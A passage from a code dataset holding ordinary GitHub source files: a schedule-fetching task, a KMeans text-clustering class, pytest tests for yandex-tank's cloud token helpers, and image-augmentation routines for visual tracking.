(r.status_code == 200):\n data = r.json()\n with open('./media/uploads/schedule/events.json', 'w') as f:\n json.dump(data, f)\n return \"Fetched schedule\"\n else:\n raise Exception(r.text)\n","repo_name":"Assembly-WebCrew/cms","sub_path":"assembly/core/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13620043247","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\nCreated on 2020/9/28 4:13 PM\n@Author: dfsj\n@Description: KMeans text clustering\n\"\"\"\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.feature_extraction.text import TfidfVectorizer, 
HashingVectorizer, TfidfTransformer\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\n\nfrom config import *\n\n\nclass KMEANS:\n \"\"\" KMeans text clustering \"\"\"\n\n vectorizer = None\n X = None\n km = None\n svd = None\n\n def __init__(self, texts, num_clusters=10, minibatch=True, n_components=100,\n n_features=250000, use_hashing=False, use_idf=True):\n \"\"\"\n :param texts: texts to cluster\n :param num_clusters: number of clusters\n :param minibatch: whether to use MiniBatchKMeans\n :param n_components: process documents with latent semantic analysis; set to None to skip compression\n :param n_features: maximum number of features (dimensions); feature compression, only used with hashed features\n :param use_hashing: use hashed feature vectors\n :param use_idf: whether to use inverse document frequency weighting\n \"\"\"\n self.texts = texts\n self.num_clusters = num_clusters\n self.minibatch = minibatch\n self.n_components = n_components\n self.n_features = n_features\n self.use_hashing = use_hashing\n self.use_idf = use_idf\n self.text2vec()\n\n def text2vec(self):\n \"\"\" Vectorize the texts \"\"\"\n if self.use_hashing:\n if self.use_idf:\n # Perform an IDF normalization on the output of HashingVectorizer\n hasher = HashingVectorizer(n_features=self.n_features, alternate_sign=False, norm=None)\n self.vectorizer = make_pipeline(hasher, TfidfTransformer())\n else:\n self.vectorizer = HashingVectorizer(n_features=self.n_features, alternate_sign=False, norm='l2')\n else:\n self.vectorizer = TfidfVectorizer(max_df=0.5, min_df=2, use_idf=self.use_idf)\n self.X = self.vectorizer.fit_transform(self.texts)\n logger.info(\"n_samples: %d, n_features: %d\" % self.X.shape)\n\n if self.n_components:\n logger.info(\"Performing dimensionality reduction using LSA\")\n # Vectorizer results are normalized, which makes KMeans behave as\n # spherical k-means for better results. Since LSA/SVD results are
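# --- Illustrative aside (toy corpus, invented strings): the TF-IDF -> TruncatedSVD -> Normalizer chain assembled in text2vec(), driven end to end. ---\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import Normalizer\ndocs = ['cats purr', 'dogs bark', 'cats and dogs', 'stocks fell', 'markets fell']\ntfidf = TfidfVectorizer().fit_transform(docs)\nlsa = make_pipeline(TruncatedSVD(n_components=2), Normalizer(copy=False))\nclusters = KMeans(n_clusters=2, n_init=10).fit_predict(lsa.fit_transform(tfidf))\n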
Since LSA/SVD results are\n # not normalized, we have to redo the normalization.\n self.svd = TruncatedSVD(self.n_components)\n normalizer = Normalizer(copy=False)\n lsa = make_pipeline(self.svd, normalizer)\n self.X = lsa.fit_transform(self.X)\n explained_variance = self.svd.explained_variance_ratio_.sum()\n logger.info(\"Explained variance of the SVD step: {}%\".format(int(explained_variance * 100)))\n\n def train(self):\n if self.minibatch:\n self.km = MiniBatchKMeans(n_clusters=self.num_clusters, init='k-means++', n_init=1,\n init_size=1000, batch_size=1000, verbose=False)\n else:\n self.km = KMeans(n_clusters=self.num_clusters, init='k-means++', max_iter=100, n_init=1, verbose=False)\n\n self.km.fit(self.X)\n return self.km\n\n def print_top_terms(self, top_n=10):\n if not self.use_hashing:\n if not self.km:\n _ = self.train()\n logger.info(\"Top terms per cluster:\")\n if self.n_components:\n original_space_centroids = self.svd.inverse_transform(self.km.cluster_centers_)\n order_centroids = original_space_centroids.argsort()[:, ::-1]\n else:\n order_centroids = self.km.cluster_centers_.argsort()[:, ::-1]\n\n terms = self.vectorizer.get_feature_names()\n for i in range(self.num_clusters):\n res = []\n for ind in order_centroids[i, :top_n]:\n res.append(terms[ind])\n logger.info(\"Cluster {}: {}\".format(i, \" \".join(res)))\n else:\n logger.warning(\"hash 编码方式不支持该方法\")\n\n def print_summary(self, labels=None):\n \"\"\" labels 为该数据集的真实类别标签,真实数据可能不存在该标签,因此部分指标可能不可用 \"\"\"\n if not self.km:\n _ = self.train()\n if labels is not None:\n logger.info(\"Homogeneity: %0.3f\" % metrics.homogeneity_score(labels, self.km.labels_))\n logger.info(\"Completeness: %0.3f\" % metrics.completeness_score(labels, self.km.labels_))\n logger.info(\"V-measure: %0.3f\" % metrics.v_measure_score(labels, self.km.labels_))\n logger.info(\"Adjusted Rand-Index: %.3f\" % metrics.adjusted_rand_score(labels, self.km.labels_))\n logger.info(\"Silhouette Coefficient: %0.3f\" %\n metrics.silhouette_score(self.X, self.km.labels_, metric='euclidean'))\n\n result = list(self.km.predict(self.X))\n logger.info('Cluster distribution:')\n logger.info(dict([(i, result.count(i)) for i in result]))\n logger.info(-self.km.score(self.X))\n\n def find_optimal_clusters(self, max_k):\n iters = range(2, max_k + 1, 2)\n\n sse = []\n for k in iters:\n sse.append(\n MiniBatchKMeans(n_clusters=k, init=\"k-means++\", init_size=1024, batch_size=2048, random_state=20).fit(\n self.X).inertia_)\n logger.info('Fit {} clusters'.format(k))\n\n f, ax = plt.subplots(1, 1)\n ax.plot(iters, sse, marker='o')\n ax.set_xlabel('Cluster Centers')\n ax.set_xticks(iters)\n ax.set_xticklabels(iters)\n ax.set_ylabel('SSE')\n ax.set_title('SSE by Cluster Center Plot')\n plt.savefig(PIC_KMEANS)\n","repo_name":"dfsj66011/text_cluster","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":5932,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"19"} +{"seq_id":"42108708829","text":"import pytest\nimport os\nfrom unittest.mock import patch, MagicMock\nfrom yandextank.plugins.DataUploader.ycloud import JwtTokenRequester, load_sa_key, build_sa_key, SAKey, \\\n JWTError, AuthTokenProvider, _get_host_port_from_url\nfrom yandextank.common.util import get_test_path\n\nRAW_KEY_FILE_PATH = os.path.join(get_test_path(), 'yandextank/plugins/DataUploader/tests/test_ycloud/raw_key.txt')\nJSON_KEY_FILE_PATH = os.path.join(get_test_path(), 
'yandextank/plugins/DataUploader/tests/test_ycloud/json_key.json')\n\n\n@pytest.fixture()\ndef patch_get_iam_token_from_metadata():\n with patch('yandextank.plugins.DataUploader.ycloud.get_iam_token_from_metadata') as p:\n p.return_value = ('some_token', 123124123)\n yield p\n\n\n@pytest.mark.parametrize('file_path, expected', [\n (RAW_KEY_FILE_PATH, SAKey('', '', 'raw_private_key_content')),\n (JSON_KEY_FILE_PATH, SAKey('json service account id', 'json key id', 'json_private_key'))\n])\ndef test_load_sa_key(file_path, expected):\n actual = load_sa_key(file_path)\n assert actual.sa_id == expected.sa_id\n assert actual.key_id == expected.key_id\n assert actual.key == expected.key\n\n\n@pytest.mark.usefixtures('patch_get_iam_token_from_metadata')\n@pytest.mark.parametrize('args', [\n ({}),\n ({'unwanted': 'some_value'}),\n])\ndef test_get_auth_token_requester_metadata(args, patch_get_iam_token_from_metadata):\n _, _ = AuthTokenProvider.get_auth_token_requester(**args)()\n patch_get_iam_token_from_metadata.assert_called_once()\n\n\n@pytest.mark.parametrize('args, expected', [\n ({'iam_token': 'some_token_payload'}, 'some_token_payload')\n])\ndef test_get_auth_token_requester_iam(args, expected):\n token, _ = AuthTokenProvider.get_auth_token_requester(**args)()\n assert token == expected\n\n\n@pytest.mark.parametrize('args', [\n ({'sa_key': 'some_private_key', 'sa_id': 'some id'}),\n ({'sa_id': 'some id', 'sa_key_id': 'some key id'}),\n ({'sa_key_file': RAW_KEY_FILE_PATH})\n])\ndef test_get_auth_token_requester_raises_error(args):\n with pytest.raises(JWTError):\n _ = AuthTokenProvider.get_auth_token_requester(**args)\n\n\n@pytest.mark.parametrize('args, expected', [\n (\n {'sa_key': 'pk', 'sa_id': 'said', 'sa_key_id': 'sakeyid'},\n SAKey('said', 'sakeyid', 'pk')\n ),\n (\n {'sa_key_file': RAW_KEY_FILE_PATH, 'sa_id': 'said', 'sa_key_id': 'sakeyid'},\n SAKey('said', 'sakeyid', 'raw_private_key_content')\n ),\n (\n {'sa_key_file': JSON_KEY_FILE_PATH, 'sa_id': 'said', 'sa_key_id': 'sakeyid'},\n SAKey('said', 'sakeyid', 'json_private_key')\n ),\n (\n {'sa_key_file': JSON_KEY_FILE_PATH},\n SAKey('json service account id', 'json key id', 'json_private_key')\n )\n])\ndef test_build_sa_key(args, expected):\n actual = build_sa_key(**args)\n\n assert actual.sa_id == expected.sa_id\n assert actual.key_id == expected.key_id\n assert actual.key == expected.key\n\n\n@pytest.mark.parametrize('url, expected_host, expected_port', [\n ('localhost:443', 'localhost', 443),\n ('loadtesting.api.cloud.yandex.net:443', 'loadtesting.api.cloud.yandex.net', 443),\n ('https://api.cloud.yandex.net:1000', 'api.cloud.yandex.net', 1000),\n ('https://api.cloud.yandex.net/iam/v1/tokens', 'api.cloud.yandex.net', None),\n ('https://128.13.14.65:100', '128.13.14.65', 100),\n ('128.13.14.65:100', '128.13.14.65', 100),\n])\ndef test_urlparser(url, expected_host, expected_port):\n host, port = _get_host_port_from_url(url)\n\n assert host == expected_host\n assert port == expected_port\n\n\n@pytest.mark.parametrize('url, expected', [\n ('localhost:443', 'https://localhost/iam/v1/tokens'),\n ('loadtesting.api.cloud.yandex.net:443', 'https://loadtesting.api.cloud.yandex.net/iam/v1/tokens'),\n ('https://api.cloud.yandex.net:1000', 'https://api.cloud.yandex.net/iam/v1/tokens'),\n ('https://api.cloud.yandex.net/iam/v1/tokens', 'https://api.cloud.yandex.net/iam/v1/tokens'),\n ('https://128.13.14.65:100', 'https://128.13.14.65/iam/v1/tokens'),\n ('128.13.14.65:100', 'https://128.13.14.65/iam/v1/tokens'),\n (None, 
'https://iam.api.cloud.yandex.net/iam/v1/tokens'),\n])\ndef test_audience_url(url, expected):\n assert expected == JwtTokenRequester(url, MagicMock(), MagicMock()).audience_url\n","repo_name":"yandex/yandex-tank","sub_path":"yandextank/plugins/DataUploader/tests/test_ycloud.py","file_name":"test_ycloud.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":2344,"dataset":"github-code","pt":"19"} 
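# --- Illustrative aside on _get_host_port_from_url as exercised by the parametrized cases above; the real helper lives in ycloud.py and is not shown here, so this is only one plausible implementation. ---\nfrom urllib.parse import urlparse\ndef host_port(url):\n parsed = urlparse(url if '//' in url else '//' + url)\n return parsed.hostname, parsed.port\nassert host_port('localhost:443') == ('localhost', 443)\nassert host_port('https://api.cloud.yandex.net/iam/v1/tokens') == ('api.cloud.yandex.net', None)\n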
+{"seq_id":"19531950400","text":"\r\n\r\nimport random\r\nimport math\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nfrom utils.image import letterbox_image\r\nfrom utils.bbox import corner2center, Center, center2corner, Corner, clip_bbox_corner\r\nfrom utils.rand import rand, random_sys\r\n\r\nPCA_STD = 0.1\r\nRGB_VAR = np.array([[-0.55919361, 0.98062831, - 0.41940627],\r\n [1.72091413, 0.19879334, - 1.82968581],\r\n [4.64467907, 4.73710203, 4.88324118]], dtype=np.float32)\r\nEIGVAL = np.array([55.46, 4.794, 1.148], dtype=np.float32)\r\nEIGVEC = np.array([[-0.5836, -0.6948, 0.4203],\r\n [-0.5808, -0.0045, -0.8140],\r\n [-0.5675, 0.7192, 0.4009]], dtype=np.float32)\r\n\r\n\r\ndef random_crop(image, bbox, size, crop_settings, mix_boxes=None):\r\n \"\"\"\r\n Random scale and shift crop augmentation in \"local\" mode\r\n refers to the paper of SiamRPN++ and the codes in PySOT\r\n once the crop region is determined, it is extracted from the original image with an OpenCV affine transform\r\n\r\n :param image: the original image\r\n :param bbox:\r\n :param size: input size required by the network\r\n :param crop_settings:\r\n :param mix_boxes:\r\n :return: the randomly scaled and cropped image together with the transformed bbox\r\n \"\"\"\r\n mean_channel = np.mean(image, axis=(0, 1))[None, None, :]\r\n bbox = Corner(float(bbox[0]), float(bbox[1]), float(bbox[2]), float(bbox[3]))\r\n\r\n context_amount = crop_settings['context_amount']\r\n scale_x, scale_y = 1., 1.\r\n # fraction of samples that keep the original aspect ratio\r\n if random_sys() > crop_settings['keep_scale_prob']:\r\n if random_sys() > 0.5:\r\n scale_x = rand(crop_settings['min_scale'], crop_settings['max_scale'])\r\n scale_y = rand(crop_settings['min_scale'], crop_settings['max_scale'])\r\n else:\r\n context_amount = context_amount * rand(crop_settings['min_scale'], crop_settings['max_scale'])\r\n\r\n bbox_center = corner2center(bbox)\r\n crop_w = bbox_center[2] + context_amount * (bbox_center[2] + bbox_center[3])\r\n crop_h = bbox_center[3] + context_amount * (bbox_center[2] + bbox_center[3])\r\n crop_size = np.sqrt(crop_w * crop_h) * crop_settings['crop_size_rate']\r\n crop_box_center = Center(bbox_center[0], bbox_center[1], crop_size * scale_x, crop_size * scale_y)\r\n crop_box = center2corner(crop_box_center)\r\n crop_box = Corner(int(crop_box[0]), int(crop_box[1]), int(crop_box[2]), int(crop_box[3]))\r\n\r\n shift = crop_size * crop_settings['shift_rate']\r\n box_protect_rate = crop_settings['box_protect_rate']\r\n # fraction of samples where the target stays centered\r\n if random_sys() > crop_settings['keep_center_prob']:\r\n sx = rand(0., 1.) * shift * (1 if random_sys() > 0.5 else -1)\r\n sy = rand(0., 1.) * shift * (1 if random_sys() > 0.5 else -1)\r\n tw = bbox.x2 - bbox.x1\r\n th = bbox.y2 - bbox.y1\r\n left = bbox.x2 - box_protect_rate * tw - crop_box_center.w\r\n right = bbox.x1 + box_protect_rate * tw + crop_box_center.w\r\n top = bbox.y2 - box_protect_rate * th - crop_box_center.h\r\n bottom = bbox.y1 + box_protect_rate * th + crop_box_center.h\r\n\r\n sx = int(max(left - crop_box[0], min(right - 1 - crop_box[2], sx)))\r\n sy = int(max(top - crop_box[1], min(bottom - 1 - crop_box[3], sy)))\r\n crop_box = Corner(crop_box[0] + sx, crop_box[1] + sy, crop_box[2] + sx, crop_box[3] + sy)\r\n\r\n h, w = image.shape[:2]\r\n left_pad = max(0, -crop_box[0])\r\n top_pad = max(0, -crop_box[1])\r\n right_pad = max(0, crop_box[2] - w + 1)\r\n bottom_pad = max(0, crop_box[3] - h + 1)\r\n pad_image_size = (h + top_pad + bottom_pad, w + left_pad + right_pad, 3)\r\n pad_image = np.ones(pad_image_size) * mean_channel\r\n pad_image = pad_image.astype(np.uint8)\r\n pad_image[top_pad: top_pad + h, left_pad: left_pad + w, :] = image\r\n crop_box = Corner(crop_box[0] + left_pad, crop_box[1] + top_pad, crop_box[2] + left_pad, crop_box[3] + top_pad)\r\n crop_image = pad_image[crop_box[1]: crop_box[3] + 1, crop_box[0]: crop_box[2] + 1, :]\r\n\r\n # box coordinates relative to the cropped region = absolute coordinates of the crop patch's top-left corner in the original image - absolute box coordinates in the original image\r\n bbox = Corner(max(bbox.x1 + float(left_pad - crop_box[0]), 0.),\r\n max(bbox.y1 + float(top_pad - crop_box[1]), 0.),\r\n min(bbox.x2 + float(left_pad - crop_box[0]), float(crop_box[2] - crop_box[0])),\r\n min(bbox.y2 + float(top_pad - crop_box[1]), float(crop_box[3] - crop_box[1])))\r\n bbox = np.array(bbox, dtype=np.float32)\r\n\r\n if mix_boxes is None:\r\n return letterbox_image(crop_image, size, bbox, padding=mean_channel)\r\n else:\r\n # all distractor boxes must be converted to the new coordinate system too\r\n all_box = mix_boxes.copy()\r\n num_boxes = len(all_box)\r\n if num_boxes > 0:\r\n for i in range(num_boxes):\r\n # this loop could be parallelized\r\n box = all_box[i]\r\n box = Corner(max(box[0] + float(left_pad - crop_box[0]), 0.),\r\n max(box[1] + float(top_pad - crop_box[1]), 0.),\r\n min(box[2] + float(left_pad - crop_box[0]), float(crop_box[2] - crop_box[0])),\r\n min(box[3] + float(top_pad - crop_box[1]), float(crop_box[3] - crop_box[1])))\r\n all_box[i] = box\r\n\r\n all_box_ = np.concatenate([bbox.reshape(-1, 4), np.array(all_box, dtype=np.float32)], axis=0)\r\n crop_image, all_box_ = letterbox_image(crop_image, size, all_box_, padding=mean_channel)\r\n bbox = all_box_[0, :]\r\n target_area = np.prod(bbox[:2] - bbox[2:])\r\n all_box = all_box_[1:, :].reshape((-1, 4))\r\n diff = all_box[:, 2:] - all_box[:, :2]\r\n area = np.prod(diff, axis=1)\r\n not_ignore = np.where((diff[:, 0] >= 0.) & (diff[:, 1] >= 0.) & (area >= 225.) 
& (area < 9 * target_area))\r\n if not_ignore[0].shape[0] > 0:\r\n all_box = all_box[not_ignore]\r\n else:\r\n all_box = None\r\n else:\r\n crop_image, bbox = letterbox_image(crop_image, size, bbox, padding=mean_channel)\r\n all_box = None\r\n return crop_image, bbox, all_box\r\n\r\n\r\ndef image_augmentation(image, bbox, aug_settings, mix_boxes=None):\r\n image = image.astype(np.float32)\r\n random = random_sys(3)\r\n\r\n # flipping and rotating\r\n if bbox is not None and random[0] < aug_settings['flip']['threshold']:\r\n if mix_boxes is None:\r\n image, bbox = flip_aug(image, bbox)\r\n else:\r\n all_boxes = np.concatenate([bbox.reshape((-1, 4)), mix_boxes], axis=0)\r\n image, all_boxes = flip_aug(image, all_boxes)\r\n bbox = all_boxes[0, :]\r\n mix_boxes = all_boxes[1:, :]\r\n\r\n elif bbox is not None and random[0] < aug_settings['rotate']['threshold']:\r\n angle = rand(.2, 1.) * aug_settings['rotate']['max_angle']\r\n if mix_boxes is None:\r\n image, bbox = rotate_aug(image, bbox, angle=angle)\r\n else:\r\n all_boxes = np.concatenate([bbox.reshape((-1, 4)), mix_boxes], axis=0)\r\n image, all_boxes = rotate_aug(image, all_boxes, angle=angle)\r\n bbox = all_boxes[0, :]\r\n mix_boxes = all_boxes[1:, :]\r\n\r\n # filtering, motion blurring and random erasing\r\n if random[1] < aug_settings['blur']['threshold']:\r\n image = blur_aug(image)\r\n\r\n elif random[1] < aug_settings['motion']['threshold']:\r\n degree = max(int(rand(.2, 1.) * aug_settings['motion']['max_degree']), 1)\r\n angle = max(int(rand(.2, 1.) * aug_settings['motion']['max_angle']), 1)\r\n image = motion_blur(image, degree=degree, angle=angle)\r\n\r\n elif random[1] < aug_settings['erase']['threshold']:\r\n image = erase_aug(image, bbox)\r\n\r\n # color and pca variation\r\n if random[2] < aug_settings['pca']['threshold']:\r\n image = pca_aug(image)\r\n elif random[2] < aug_settings['color']['threshold']:\r\n image = color_aug(image)\r\n\r\n if mix_boxes is None:\r\n return image, bbox\r\n else:\r\n return image, bbox, mix_boxes\r\n\r\n\r\ndef rand_kernel():\r\n size = random.randrange(5, 20, 2)\r\n kernel = np.zeros((size, size))\r\n c = int(size/2)\r\n wx = random_sys()\r\n kernel[:, c] += 1. / size * wx\r\n kernel[c, :] += 1. 
/ size * (1-wx)\r\n return kernel\r\n\r\n\r\ndef gray_aug(image):\r\n image = image.astype(np.uint8)\r\n grayed = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n image = cv2.cvtColor(grayed, cv2.COLOR_GRAY2BGR)\r\n image = image.astype(np.float32)\r\n return image\r\n\r\n\r\ndef pca_aug(image):\r\n rd = []\r\n for i in range(3):\r\n rd.append(random.normalvariate(0., PCA_STD))\r\n alpha = np.array(rd, dtype=np.float32).reshape((-1, ))\r\n offset = np.dot(EIGVEC * alpha, EIGVAL)\r\n image = image + offset\r\n return image\r\n\r\n\r\ndef blur_aug(image):\r\n kernel = rand_kernel()\r\n image = cv2.filter2D(image, -1, kernel)\r\n return image\r\n\r\n\r\ndef color_aug(image):\r\n rd = []\r\n for i in range(3):\r\n rd.append(random.normalvariate(0., 1.))\r\n rd = np.array(rd, dtype=np.float32).reshape((-1, 1))\r\n offset = np.dot(RGB_VAR, rd)\r\n offset = offset.reshape(3)\r\n image = image - offset\r\n image = np.maximum(np.minimum(image, 255.0), 0.0)\r\n return image\r\n\r\n\r\ndef motion_blur(image, degree=10, angle=40):\r\n # Build a motion-blur kernel matrix for an arbitrary angle; the larger the degree, the stronger the blur\r\n m = cv2.getRotationMatrix2D((degree / 2, degree / 2), angle, 1)\r\n motion_blur_kernel = np.diag(np.ones(degree))\r\n motion_blur_kernel = cv2.warpAffine(motion_blur_kernel, m, (degree, degree))\r\n motion_blur_kernel = motion_blur_kernel / degree\r\n blurred = cv2.filter2D(image, -1, motion_blur_kernel)\r\n return blurred\r\n\r\n\r\ndef flip_aug(image, bbox):\r\n image = cv2.flip(image, 1)\r\n width = image.shape[1]\r\n if len(bbox.shape) == 1:\r\n bbox = Corner(width - 1 - bbox[2], bbox[1], width - 1 - bbox[0], bbox[3])\r\n else:\r\n for i in range(bbox.shape[0]):\r\n box = bbox[i, :]\r\n box = Corner(width - 1 - box[2], box[1], width - 1 - box[0], box[3])\r\n bbox[i, :] = box\r\n bbox = np.array(bbox, dtype=np.float32)\r\n return image, bbox\r\n\r\n\r\ndef rotate_aug(img, bbox, angle=5, scale=1.):\r\n \"\"\"\r\n references:https://blog.csdn.net/saltriver/article/details/79680189\r\n https://www.ctolib.com/topics-44419.html\r\n on affine transforms: https://www.zhihu.com/question/20666664\r\n\r\n :param img: image array, (h,w,c)\r\n :param bbox: bounding box in [x_min, y_min, x_max, y_max] form\r\n :param angle: angle of rotation\r\n :param scale: defaults to 1.\r\n :return:\r\n rot_img: the rotated image array;\r\n rot_bboxes: list of the rotated bounding box coordinates\r\n \"\"\"\r\n # ---------------------- rotate the image ----------------------\r\n w = img.shape[1]\r\n h = img.shape[0]\r\n # degrees to radians\r\n rangle = np.deg2rad(angle)\r\n # compute the width and height of the new image from the extents of the rotated corners\r\n nw = (abs(np.sin(rangle) * h) + abs(np.cos(rangle) * w)) * scale\r\n nh = (abs(np.cos(rangle) * h) + abs(np.sin(rangle) * w)) * scale\r\n # get the rotation matrix of the image about a given point\r\n # getRotationMatrix2D(Point2f center, double angle, double scale)\r\n # Point2f center: the center of rotation\r\n # double angle: the rotation angle\r\n # double scale: the image scaling factor\r\n # reference: https://cloud.tencent.com/developer/article/1425373\r\n rot_mat = cv2.getRotationMatrix2D((nw * 0.5, nh * 0.5), angle, scale) # returns a 2x3 matrix\r\n # offset between the new center and the old center\r\n rot_move = np.dot(rot_mat, np.array([(nw - w) * 0.5, (nh - h) * 0.5, 0]))\r\n # the move only affects the translation, so update the translation\r\n # part of the transform\r\n rot_mat[0, 2] += rot_move[0]\r\n rot_mat[1, 2] += rot_move[1]\r\n # apply the affine transform\r\n rotated_img = cv2.warpAffine(img,\r\n rot_mat,\r\n (int(math.ceil(nw)), int(math.ceil(nh))),\r\n flags=cv2.INTER_LANCZOS4,\r\n borderMode=cv2.BORDER_CONSTANT, # borderMode=cv2.BORDER_REFLECT,\r\n borderValue=tuple(np.mean(img, axis=(0, 1)).astype(np.uint8).tolist()))\r\n\r\n rotated_img = cv2.resize(rotated_img, (w, h),
interpolation=cv2.INTER_CUBIC)\r\n\r\n # ---------------------- correct the bounding box ----------------------\r\n # rot_mat is the final rotation matrix\r\n # take the four edge midpoints of the original bbox and transform them into the rotated coordinate system\r\n def rotate_box(box):\r\n x_min = box[0]\r\n y_min = box[1]\r\n x_max = box[2]\r\n y_max = box[3]\r\n point1 = np.dot(rot_mat, np.array([(x_min + x_max) / 2, y_min, 1]))\r\n point2 = np.dot(rot_mat, np.array([x_max, (y_min + y_max) / 2, 1]))\r\n point3 = np.dot(rot_mat, np.array([(x_min + x_max) / 2, y_max, 1]))\r\n point4 = np.dot(rot_mat, np.array([x_min, (y_min + y_max) / 2, 1]))\r\n\r\n # merge into one np.array\r\n concat = np.vstack((point1, point2, point3, point4)) # stacked vertically\r\n # change the array dtype\r\n concat = concat.astype(np.int32)\r\n # get the rotated coordinates\r\n rx, ry, rw, rh = cv2.boundingRect(concat)\r\n rx_min = rx\r\n ry_min = ry\r\n rx_max = rx + rw\r\n ry_max = ry + rh\r\n # collect into a list\r\n rotated_box = np.array([rx_min, ry_min, rx_max, ry_max])\r\n\r\n scale_w = float(w) / nw\r\n scale_h = float(h) / nh\r\n rotated_box = rotated_box * np.array([scale_w, scale_h, scale_w, scale_h])\r\n return rotated_box\r\n\r\n if len(bbox.shape) == 1:\r\n bbox = rotate_box(bbox)\r\n else:\r\n for i in range(bbox.shape[0]):\r\n box = bbox[i, :]\r\n box = rotate_box(box)\r\n bbox[i, :] = box\r\n\r\n bbox = np.array(bbox, dtype=np.float32)\r\n return rotated_img, bbox\r\n\r\n\r\ndef erase_aug(image, bbox):\r\n \"\"\"\r\n Randomly erase part of the region on the target\r\n\r\n :param image:\r\n :param bbox:\r\n :return:\r\n \"\"\"\r\n ih, iw = image.shape[:2]\r\n bbox_xywh = corner2center(bbox)\r\n boundary = bbox_xywh * np.array([1., 1., rand(1., 1.2), rand(1., 1.2)], np.float32)\r\n\r\n w = boundary[2]\r\n h = boundary[3]\r\n\r\n scale1 = rand(0.15, 0.5)\r\n scale2 = rand(0.15, 0.2 / scale1)\r\n if random_sys() > 0.5:\r\n ew = int(w * scale1)\r\n eh = int(h * scale2)\r\n else:\r\n ew = int(w * scale2)\r\n eh = int(h * scale1)\r\n\r\n area = bbox - np.array([0., 0., ew, eh], np.float32)\r\n\r\n mask = np.zeros(shape=(ih, iw), dtype=np.float32)\r\n box = list(map(int, area))\r\n mask[box[1]: box[3] + 1, box[0]: box[2] + 1] = 1.\r\n\r\n pos = np.where(mask == 1.)\r\n num = pos[0].shape[0]\r\n if num > 0:\r\n if num > 1:\r\n choice = random.randint(0, num-1)\r\n else:\r\n choice = 0\r\n y1, x1 = pos[0][choice], pos[1][choice]\r\n if y1 + eh < bbox[3] and x1 + ew < bbox[2]:\r\n image[y1: y1 + eh, x1: x1 + ew, :] = 127.5\r\n return image\r\n\r\n\r\ndef mix_aug(image, bbox, mix, min_rate, max_rate):\r\n \"\"\"\r\n Randomly place a distractor object in the area around the target\r\n\r\n :param image:\r\n :param bbox:\r\n :param mix:\r\n :param min_rate:\r\n :param max_rate:\r\n :return:\r\n \"\"\"\r\n mix_h, mix_w = mix.shape[:2]\r\n ih, iw = image.shape[:2]\r\n size = np.array([-mix_w, -mix_h, 0., 0.], np.float32)\r\n boundary = np.array([0., 0., iw - mix_w - 1, ih - mix_h - 1], np.float32)\r\n\r\n bbox_xywh = corner2center(bbox)\r\n min_range = bbox_xywh * np.array([1., 1., min_rate, min_rate], np.float32)\r\n max_range = bbox_xywh * np.array([1., 1., max_rate, max_rate], np.float32)\r\n max_range_corner_ = center2corner(max_range)\r\n min_range_corner_ = center2corner(min_range)\r\n\r\n min_range_corner = min_range_corner_ + size\r\n min_x1y1 = np.maximum(min_range_corner[:2], boundary[:2])\r\n min_x2y2 = np.minimum(min_range_corner[2:], boundary[2:])\r\n min_range = np.concatenate([min_x1y1, min_x2y2])\r\n\r\n max_range_corner = max_range_corner_ + size\r\n max_x1y1 = np.maximum(max_range_corner[:2], boundary[:2])\r\n max_x2y2 = np.minimum(max_range_corner[2:], boundary[2:])\r\n max_range = np.concatenate([max_x1y1, max_x2y2])\r\n\r\n min_mask =
np.ones(shape=(ih, iw), dtype=np.float32)\r\n box = list(map(int, min_range))\r\n min_mask[box[1]: box[3] + 1, box[0]: box[2] + 1] = 0.\r\n\r\n max_mask = np.zeros(shape=(ih, iw), dtype=np.float32)\r\n box = list(map(int, max_range))\r\n max_mask[box[1]: box[3] + 1, box[0]: box[2] + 1] = 1.\r\n\r\n mask = min_mask * max_mask\r\n\r\n center_pos = np.where(mask == 1.)\r\n num = center_pos[0].shape[0]\r\n if num > 0:\r\n if num > 1:\r\n choice = random.randint(0, num-1)\r\n else:\r\n choice = 0\r\n y1, x1 = center_pos[0][choice], center_pos[1][choice]\r\n if y1 + mix_h < ih and x1 + mix_w < iw:\r\n image[y1: y1 + mix_h, x1: x1 + mix_w] = mix\r\n mixed_box = np.array([x1, y1, x1 + mix_w, y1 + mix_h], dtype=np.float32)\r\n else:\r\n mixed_box = None\r\n else:\r\n mixed_box = None\r\n return image, mixed_box\r\n\r\n\r\ndef occ_aug(image, bbox, mix_object, center_rate, try_num=5, overlap_thresh=0.8):\r\n \"\"\"\r\n Randomly overlay a distractor object on top of the target\r\n \"\"\"\r\n overlap = 0.\r\n mix_h, mix_w = mix_object.shape[:2]\r\n ih, iw = image.shape[:2]\r\n object_area = np.prod(bbox[2:] - bbox[:2])\r\n x, y, w, h = corner2center(bbox)\r\n\r\n counter = 0\r\n while counter < try_num and overlap <= overlap_thresh:\r\n x_rate, y_rate = rand(-center_rate, center_rate), rand(-center_rate, center_rate)\r\n ox = x + x_rate * w\r\n oy = y + y_rate * h\r\n occ_box = np.array([ox, oy, mix_w, mix_h], np.float32)\r\n occ_box = center2corner(occ_box)\r\n occ_box = clip_bbox_corner(occ_box, (ih, iw))\r\n inter_x1y1 = np.maximum(bbox[:2], occ_box[:2])\r\n inter_x2y2 = np.minimum(bbox[2:], occ_box[2:])\r\n inter_area = np.prod(inter_x2y2 - inter_x1y1)\r\n overlap = inter_area / (object_area + 1e-6)\r\n counter += 1\r\n\r\n if overlap > overlap_thresh:\r\n occ_box = list(map(int, occ_box))\r\n x1, y1, x2, y2 = occ_box\r\n if y1 + mix_h < ih and x1 + mix_w < iw:\r\n image[y1: y1 + mix_h, x1: x1 + mix_w] = mix_object\r\n occ_box = np.array([x1, y1, x1 + mix_w, y1 + 